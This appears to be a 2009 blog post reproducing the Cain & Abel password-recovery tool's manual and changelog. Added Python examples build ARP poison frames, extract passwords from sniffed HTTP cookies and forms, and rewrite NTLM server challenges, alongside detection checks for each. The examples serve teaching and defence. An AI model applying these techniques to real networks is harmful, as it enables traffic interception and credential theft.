
Cain & Abel 4.9.31 - New Version

by 날으는물고기, June 3, 2009


Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of several kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers security weaknesses intrinsic to protocol standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, but it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else who plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program.

Be warned that you may cause damage and/or loss of data using this software, and that in no event shall the author be liable for such damage or loss of data. Please carefully read the License Agreement included in this manual before using the program.


Configuration

Cain & Abel requires the configuration of some parameters; everything can be set from the main configuration dialog.

Sniffer Tab

Here you can set the network card to be used by Cain's sniffer and APR features. The last two check boxes enable or disable these functions at program startup.

The sniffer is compatible with Winpcap drivers version 2.3 or later; in this version only Ethernet adapters are supported by the program.

If enabled, the option "Don't use Promiscuous mode" allows APR poisoning on wireless networks, but note that in this situation you cannot use the MAC spoofing feature described below.

APR Tab

This is where you can configure APR (ARP Poison Routing). Cain uses a separate thread that sends ARP poison packets to victim hosts every 30 seconds by default. This is necessary because entries in the ARP cache of remote machines can be flushed out when there is no traffic. From this dialog you can set the time between each ARP poison storm: setting this parameter to a few seconds will cause a lot of ARP traffic on the network, while setting it to a long delay may not produce the desired traffic hijacking, because the victims' caches expire before the next storm.

The spoofing options define the addresses that Cain writes into the Ethernet and ARP headers of ARP poison packets and re-routed packets. With spoofing enabled the attacker's real MAC and IP addresses are never sent on the network, so the attack leaves no attacker address on the wire; the attacker remains identifiable, however, by the switch port the spoofed frames enter on.

If you want to enable this option you must consider that:

  • Ethernet address spoofing can be used only if the attacker's workstation is connected to a hub or to a network switch that does not use the "Port Security" feature. If "Port Security" is enabled on the switch, the source MAC address of every Ethernet frame is checked against a list of allowed MAC addresses configured on the switch. If the spoofing MAC address is not in this list the switch will disable the port and you will lose connectivity.

  • The spoofing IP address must be a free address of your subnet. ARP does not cross routers or VLANs, so if you set a spoofing IP that is outside your subnet the remote host will reply to its default gateway and you will not see its responses. If you use a spoofing IP address that is already in use in your subnet there will be an "IP address conflict" and the attack will be easily noticed. The network and broadcast addresses of the subnet are not usable either. Here are some examples of valid spoofing addresses:

    Real IP address   Subnet mask       Valid range for the spoofing IP address
    192.168.0.1       255.255.255.0     Any unused address in 192.168.0.2 - 192.168.0.254
    10.0.0.1          255.255.0.0       Any unused address in 10.0.0.2 - 10.0.255.254
    172.16.0.1        255.255.255.240   Any unused address in 172.16.0.2 - 172.16.0.14
    200.200.200.1     255.255.255.252   Only 200.200.200.2, if unused (200.200.200.3 is the broadcast address of this /30 and cannot be used)

The spoofing IP address is automatically checked by the program when you press the "Apply" button; if the address is already in use in the subnet, a message box will report the problem.

  • The spoofing MAC address must not be present in your subnet. Two identical MAC addresses on the same Layer-2 LAN make switches relearn the address back and forth between ports (MAC flapping); for this reason I decided not to let you easily set the spoofing MAC of your choice from the configuration dialog. The default value is 001122334455, an address that is not supposed to exist in your network and that can be easily identified for troubleshooting (and, for the same reason, is easy for a defender to alert on). IMPORTANT! You cannot have, on the same Layer-2 network, two or more Cain machines using APR's MAC spoofing with the same spoofed MAC address. The spoofing MAC address can be changed by modifying the registry value "SpoofMAC" at this location: "HKEY_CURRENT_USER\Software\Cain\Settings".
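The following is an added example (not Cain's code, and not from the Cain manual) showing the two points above in working form: which host addresses qualify as a spoofing IP for a given real IP and subnet mask (it reproduces the table above), and which header fields of an ARP poison packet carry the spoofed MAC, together with the checks a defender would run over the same frame. The packet layout is an assumption: the poison packet is modelled as an unsolicited ARP reply addressed to the victim, with the spoof MAC in both the Ethernet source field and the ARP sender-hardware-address field and the impersonated host's IP (for example the gateway) in the sender-protocol-address field; Cain's exact frame construction is not documented on this page. The victim and gateway addresses are constructed sample input.

```python
# Added example (not Cain's code): which header fields carry APR's spoofed
# addresses, and which addresses qualify as a spoofing IP for a subnet.
#
# Assumptions not stated on the page: the poison packet is modelled as an
# unsolicited ARP reply sent to the victim; the spoof MAC is placed in both
# the Ethernet source field and the ARP sender-hardware-address field, and
# the impersonated host's IP (e.g. the gateway) in the ARP sender-protocol
# address. Cain's exact frame layout may differ.
import ipaddress
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
DEFAULT_SPOOF_MAC = "00:11:22:33:44:55"   # default SpoofMAC value from the page


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def spoof_ip_range(real_ip: str, netmask: str) -> tuple:
    """First and last usable spoofing IP: inside the subnet, not the network
    or broadcast address, and not the attacker's own address."""
    net = ipaddress.IPv4Network(f"{real_ip}/{netmask}", strict=False)
    own = ipaddress.IPv4Address(real_ip)
    hosts = [h for h in net.hosts() if h != own]
    if not hosts:
        raise ValueError("subnet has no free host address")
    return str(hosts[0]), str(hosts[-1])


def is_valid_spoof_ip(real_ip: str, netmask: str, candidate: str,
                      in_use=frozenset()) -> bool:
    """The subnet rules above plus the in-use check Cain's "Apply" button
    performs; `in_use` stands in for Cain's live probe (constructed input)."""
    net = ipaddress.IPv4Network(f"{real_ip}/{netmask}", strict=False)
    cand = ipaddress.IPv4Address(candidate)
    return (cand in net
            and cand not in (net.network_address, net.broadcast_address)
            and cand != ipaddress.IPv4Address(real_ip)
            and candidate not in in_use)


def build_arp_poison_reply(victim_mac: str, victim_ip: str,
                           impersonated_ip: str, spoof_mac: str) -> bytes:
    """Ethernet + ARP frame telling the victim that `impersonated_ip` is at
    `spoof_mac`. Only spoof_mac and impersonated_ip appear as sender fields;
    the attacker's real MAC and IP are nowhere in the frame."""
    eth = mac_bytes(victim_mac) + mac_bytes(spoof_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # htype, ptype, hlen, plen, op
    arp += mac_bytes(spoof_mac) + ipaddress.IPv4Address(impersonated_ip).packed  # SHA, SPA
    arp += mac_bytes(victim_mac) + ipaddress.IPv4Address(victim_ip).packed       # THA, TPA
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into its addressing fields."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    op = struct.unpack("!H", frame[20:22])[0]
    return {
        "eth_dst": mac_str(frame[0:6]), "eth_src": mac_str(frame[6:12]), "op": op,
        "sha": mac_str(frame[22:28]), "spa": str(ipaddress.IPv4Address(frame[28:32])),
        "tha": mac_str(frame[32:38]), "tpa": str(ipaddress.IPv4Address(frame[38:42])),
    }


def arp_poison_indicators(frame: bytes, known: dict) -> list:
    """Defender-side check: reasons an ARP frame looks like APR traffic.
    `known` maps IP -> legitimate MAC (e.g. from a DHCP or inventory export)."""
    p = parse_arp(frame)
    hits = []
    if DEFAULT_SPOOF_MAC in (p["sha"], p["eth_src"]):
        hits.append("cain-default-spoof-mac")
    if p["eth_src"] != p["sha"]:
        hits.append("eth-src/arp-sha mismatch")
    if p["op"] == ARP_REPLY and known.get(p["spa"]) not in (None, p["sha"]):
        hits.append(f"{p['spa']} moved from {known[p['spa']]} to {p['sha']}")
    return hits


if __name__ == "__main__":
    print(spoof_ip_range("200.200.200.1", "255.255.255.252"))
    frame = build_arp_poison_reply("aa:bb:cc:dd:ee:01", "192.168.0.10",
                                   "192.168.0.254", DEFAULT_SPOOF_MAC)
    print(parse_arp(frame))
    print(arp_poison_indicators(frame, {"192.168.0.254": "00:50:56:00:00:01"}))
```

The /30 case is where the table is easy to get wrong: `net.hosts()` already excludes the network and broadcast addresses, so removing the attacker's own address leaves exactly one candidate. On the detection side, the default spoof MAC is a cheap indicator, but the IP-to-MAC change check is the one that also catches an attacker who changed the `SpoofMAC` registry value.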

Filters and Ports Tab

Here you can enable or disable Cain's sniffer filters and the application-protocol TCP/UDP ports they listen on. Cain captures only authentication information, not the entire content of each packet; however, you can use the Telnet filter to dump all the data of a TCP session into a file by changing that filter's port.

Cain's sniffer filters are internally designed to survive in an unreliable world such as a network under ARP poison attack; Cain uses separate state machines to extract from network packets all the information needed to recover the plaintext form of a transmitted password. Some authentication protocols use a challenge-response mechanism, so the filter needs to collect parameters from both Client->Server and Server->Client traffic. Interception in both directions is always possible if your Layer-2 network is made of hubs only or if you are connected to a mirror port on the switch; on switched networks in general it can be achieved only with some kind of traffic hijacking technique such as ARP Poison Routing (APR). If you are sniffing with APR enabled, the sniffer will extract challenge-response authentications only if you reach a Full-Routing state between the victim computers.

Under this tab you can also enable/disable the analysis of routing protocols (HSRP, VRRP, EIGRP, OSPF, RIPv1, RIPv2) and the APR-DNS feature that acts as a DNS Reply Rewriter.

HTTP Fields Tab

This tab contains a list of user name and password field names to be used by the HTTP sniffer filter. Cookies and HTML forms that travel in HTTP packets are examined in this way: for each user name field, all the password fields are checked, and if both parameters are found the credentials are captured and displayed on the screen.

The cookie in the following request uses the fields "logonusername=" and "userpassword=" for authentication; if you don't include these two fields in the list above, the sniffer will not extract the corresponding credentials.

GET /mail/Login?domain=xxxxxx.xx&style=default&plain=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://xxx.xxxxxxx.xx/xxxxx/xxxx
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3); .NET CLR 1.1.4322)
Host: xxx.xxxxxx.xx
Connection: Keep-Alive
Cookie: ss=1; logonusername=user@xxxxxx.xx; ss=1; srclng=it; srcdmn=it; srctrg=_blank; srcbld=y; srcauto=on; srcclp=on; srcsct=web; userpassword=password; video=c1; TEMPLATE=default;
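As an added example (not Cain's code, and not from the Cain manual), the following Python reproduces the matching rule described for this tab: it parses a raw HTTP request, collects name/value pairs from the Cookie header and from a urlencoded form body, and emits a credential only when a configured user name field and a configured password field are both present. The field lists, the `webmail.example.test` host, the POST sample and the no-credential sample are constructed for illustration; the GET sample is the request shown on this page.

```python
# Added example (not Cain's code): extracting credentials from HTTP requests
# the way the HTTP Fields tab describes. The field lists, the POST sample and
# the host names are constructed; the GET sample is the one shown on the page.
from urllib.parse import parse_qsl

# Field names as they would be configured in the HTTP Fields tab (assumed list).
USERNAME_FIELDS = ["logonusername", "username", "login", "email"]
PASSWORD_FIELDS = ["userpassword", "password", "passwd", "pwd"]


def parse_request(raw: str):
    """Split a raw HTTP request into request line, lower-cased header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def cookie_pairs(cookie_header: str):
    """Cookie header -> [(name, value)], tolerating repeated names (ss=1 twice)."""
    pairs = []
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def form_pairs(body: str, content_type: str):
    """Form body -> [(name, value)], only for urlencoded forms."""
    if "application/x-www-form-urlencoded" not in content_type.lower():
        return []
    return parse_qsl(body, keep_blank_values=True)


def find_credentials(pairs, user_fields=USERNAME_FIELDS, pass_fields=PASSWORD_FIELDS):
    """For every configured user name field present, check every configured
    password field; a hit requires both, exactly as the tab describes."""
    values = {name.lower(): value for name, value in pairs}
    found = []
    for uf in user_fields:
        if uf.lower() in values:
            for pf in pass_fields:
                if pf.lower() in values:
                    found.append((values[uf.lower()], values[pf.lower()]))
    return found


def extract_http_credentials(raw: str):
    """Credentials from cookies and urlencoded form bodies: [(host, user, password)]."""
    _, headers, body = parse_request(raw)
    pairs = cookie_pairs(headers.get("cookie", "")) + \
        form_pairs(body, headers.get("content-type", ""))
    host = headers.get("host", "")
    return [(host, u, p) for u, p in find_credentials(pairs)]


# The request shown on this page (cookie-based logon), headers trimmed.
PAGE_SAMPLE = (
    "GET /mail/Login?domain=xxxxxx.xx&style=default&plain=0 HTTP/1.1\r\n"
    "Host: xxx.xxxxxx.xx\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: ss=1; logonusername=user@xxxxxx.xx; ss=1; srclng=it; srcdmn=it; "
    "srctrg=_blank; srcbld=y; srcauto=on; srcclp=on; srcsct=web; "
    "userpassword=password; video=c1; TEMPLATE=default;\r\n\r\n"
)

# Constructed: a form login whose field names are also on the list.
FORM_SAMPLE = (
    "POST /login HTTP/1.1\r\n"
    "Host: webmail.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n\r\n"
    "username=alice&password=s3cret%21"
)

# Constructed: a session cookie only, no configured field names present.
NO_CREDS_SAMPLE = (
    "GET / HTTP/1.1\r\nHost: webmail.example.test\r\n"
    "Cookie: sessionid=abc123; theme=dark\r\n\r\n"
)

if __name__ == "__main__":
    for sample in (PAGE_SAMPLE, FORM_SAMPLE, NO_CREDS_SAMPLE):
        print(extract_http_credentials(sample))
```

The third sample is the case the text warns about: a logon whose field names are not on the list yields nothing, which is why the list has to be extended per target application. Matching is case-insensitive here, which is an assumption about what a practitioner would want rather than something the page states about Cain.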

Traceroute Tab

This is used to configure Cain's ICMP/UDP/TCP traceroute. You can set to resolve host names, use ICMP Mask discovery and enable/disable WHOIS information extraction for each hop.

Challenge Spoofing Tab

Here you can set the custom challenge value to be rewritten into NTLM authentication packets. This feature can be enabled quickly from Cain's toolbar and must be used together with APR, because the server's challenge can only be replaced on its way to the client when Cain sits in the middle. A fixed challenge makes the client's response depend on the password hash alone, which enables cracking of NTLM hashes captured on the network by means of rainbow tables.
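The following is an added example (not Cain's code, and not from the Cain manual) of what the rewrite does at the byte level and how a defender can notice it. It builds a minimal NTLM CHALLENGE_MESSAGE (Type 2) using the MS-NLMP layout (Signature "NTLMSSP\0", MessageType 2, TargetNameFields, NegotiateFlags, then the 8-byte ServerChallenge at offset 24), overwrites only the challenge bytes as a man-in-the-middle would, and counts challenge reuse across captured messages, since a genuine server draws a fresh random challenge per authentication. The fixed value 1122334455667788, the sample negotiate flags and the server name are assumptions; the captured traffic is constructed in `simulate`.

```python
# Added example (not Cain's code): the byte-level effect of rewriting the
# server challenge in an NTLM CHALLENGE_MESSAGE (Type 2), and a defender-side
# check for challenge reuse. Layout per MS-NLMP: Signature(8) "NTLMSSP\0",
# MessageType(4)=2, TargetNameFields(8), NegotiateFlags(4), ServerChallenge(8)
# at offset 24, Reserved(8), TargetInfoFields(8). The fixed value, the sample
# flags and the server name are assumptions made for this example.
import os
import struct
from collections import Counter

NTLMSSP = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2
CHALLENGE_OFFSET = 24
HEADER_LEN = 48                                       # header without the Version field
FIXED_CHALLENGE = bytes.fromhex("1122334455667788")   # assumed fixed value


def build_type2(server_challenge: bytes, target: str = "FILESRV01",
                flags: int = 0x00008201) -> bytes:
    """Minimal Type 2 message: fixed header, then the target name as UTF-16LE."""
    if len(server_challenge) != 8:
        raise ValueError("server challenge must be 8 bytes")
    tname = target.encode("utf-16-le")
    msg = NTLMSSP + struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(tname), len(tname), HEADER_LEN)   # TargetNameFields
    msg += struct.pack("<I", flags)                                  # NegotiateFlags (sample)
    msg += server_challenge                                          # ServerChallenge
    msg += b"\x00" * 8                                               # Reserved
    msg += struct.pack("<HHI", 0, 0, HEADER_LEN + len(tname))        # TargetInfoFields (empty)
    return msg + tname


def parse_type2(msg: bytes) -> dict:
    """Validate the signature and type, and pull out flags, challenge and target."""
    if msg[:8] != NTLMSSP or struct.unpack("<I", msg[8:12])[0] != CHALLENGE_MESSAGE:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tlen, _, toff = struct.unpack("<HHI", msg[12:20])
    flags = struct.unpack("<I", msg[20:24])[0]
    challenge = msg[CHALLENGE_OFFSET:CHALLENGE_OFFSET + 8]
    target = msg[toff:toff + tlen].decode("utf-16-le")
    return {"flags": flags, "challenge": challenge, "target": target}


def rewrite_challenge(msg: bytes, fixed: bytes = FIXED_CHALLENGE) -> bytes:
    """What the man-in-the-middle does to the server's Type 2 on its way to
    the client: overwrite the 8 challenge bytes and nothing else. The client
    then computes its response against `fixed`, so one precomputed table
    covers every capture."""
    parse_type2(msg)   # refuse to touch anything that is not a Type 2
    return msg[:CHALLENGE_OFFSET] + fixed + msg[CHALLENGE_OFFSET + 8:]


def challenge_reuse(messages, threshold: int = 2) -> dict:
    """Defender-side check over captured Type 2 messages: a legitimate server
    draws a fresh random challenge per authentication, so any value seen
    `threshold` or more times is suspicious. Returns {hex challenge: count}."""
    counts = Counter(parse_type2(m)["challenge"] for m in messages)
    return {c.hex(): n for c, n in counts.items() if n >= threshold}


def simulate(n: int = 5):
    """Constructed traffic: n genuine messages, then the same n after a
    man-in-the-middle rewrote them. Returns both reuse reports."""
    genuine = [build_type2(os.urandom(8)) for _ in range(n)]
    rewritten = [rewrite_challenge(m) for m in genuine]
    return challenge_reuse(genuine), challenge_reuse(rewritten)


if __name__ == "__main__":
    before, after = simulate()
    print("genuine:", before)
    print("rewritten:", after)
```

Locating the Type 2 blob inside SMB, HTTP or other carriers is left out; once it is in hand, the 8 bytes at offset 24 are the whole story. A SIEM rule that alerts when the same server challenge appears in more than one authentication, or when it equals a known tool default, catches this technique regardless of which tool performed the rewrite.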

 

[Figure: Sniffer APR]

Cain & Abel - Changelog


What's new in Cain & Abel 4.9.31:

· SIPS Man-in-the-Middle Sniffer (TCP port 5061; successfully tested with Microsoft Office Communicator with chained certificates).
· Added support for RTP G726-64WB codec (Wengo speex replacement) in VoIP sniffer.
· X509 certificate's extensions are now preserved in chained fake certificates generated by Certificate Collector.
· Extended ASCII characters support for SSID in Passive Wireless Scanner.
· Some bugs in Cain's Traceroute fixed.

What's new in Cain & Abel 4.9.30 and earlier versions:

· Added support for the following codecs in VoIP sniffer: G722, Speex-16kHz, Speex-32kHz, AMR-NB, AMR-WB.
· Transmission rate fixed to 6 Mbps in enumeration function of AirPcap TX channels.
· Fixed a bug in all APR-SSL based sniffer filters to avoid 100% CPU utilization while forwarding data.
· Fixed a bug in Certificate Collector and automatic fake certificate generation (issuers with CN field instead of OU are now handled).
· Fixed a bug in PPPoE sniffer about CHAP-MD5 hashes incorrectly recognized as MS-CHAP hashes.
· OpenSSL library upgrade to version 0.9.8j.
· OUI list updated.
· Added channel hopping capability on A, BG and ABG channels in Passive Wireless Sniffer.
· Added support for A channels in Passive Wireless Sniffer.
· Added automatic detection of RX/TX ABG channels for AirPcap NX adapters.
· WEP ARP injection thread now avoids sending packets to disassociated stations.
· Fixed a bug in the visualization list of wireless clients (thanks: spino).
· Fixed a bug (program crash) when starting the sniffer on wireless adapters (e.g. Intel PRO/Wireless 3945ABG) with Winpcap 4.x.
· Fixed a bug in WinRTgen about table size visualization.
· AirPcap library upgrade to version 4.0.0 (to support the new AirPcap NX adapters from CACE Technologies).
· Winpcap library upgrade to version 4.1 beta 5.
· Automatic Certificate Collector for FTPS (implicit), IMAPS and POP3S protocols.
· FTPS Man-in-the-Middle Sniffer and password collector.
· POP3S Man-in-the-Middle Sniffer and password collector.
· IMAPS Man-in-the-Middle Sniffer and password collector.
· Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
· Added PTW WEP cracking attack.
· Added Windows Vista support in Wireless Password Decoder.
· Wireless Password Decoder now uses DLL injection under XP.
· WPA-PSK (Dictionary and Brute-Force Attacks).
· WPA-PSK Auth (Dictionary and Brute-Force Attacks).
· WPA-PSK Authentications sniffer.
· WPA-PSK Hashes Cryptanalysis via Sorted Rainbow Tables.
· WPA-PSK RainbowTables have been added to Winrtgen v2.5.
· Added IE7 passwords support in Credential Manager Password Decoder.
· OpenSSL library upgrade to version 0.9.8e.
· WEP cracking speed-up via wireless ARP request injection (AirPcap USB adapter is needed). This feature has been successfully tested with AirPcap drivers v2.0 beta TX.
· Ability to deauthenticate client stations from Access Points.
· Added Windows Vista compatibility in NTLM Hashes Dumper, LSA Hashes Dumper and Syskey Dumper for hive files.
· Added Ophcrack's RainbowTables support for NTLM Hashes Cryptanalysis attack.
· MSCACHE Hashes Cryptanalysis via Sorted Rainbow Tables.
· ORACLE Hashes Cryptanalysis via Sorted Rainbow Tables.
· New RainbowTable types have been added to Winrtgen v2.0. "mscache" and "oracle" tables can be used against MSCACHE and ORACLE hashes for specific usernames that can be set in the configuration dialog.
· Added hash synchronization functions (Export/Import) to/from Cain for PocketPC via ActiveSync.
· Added VoIP sniffer support for the following codecs: G723.1, G726-16, G726-24, G726-32, G726-40, LPC-10.
· Added support for Winpcap v3.2.


Download: http://www.oxid.it/cain.html
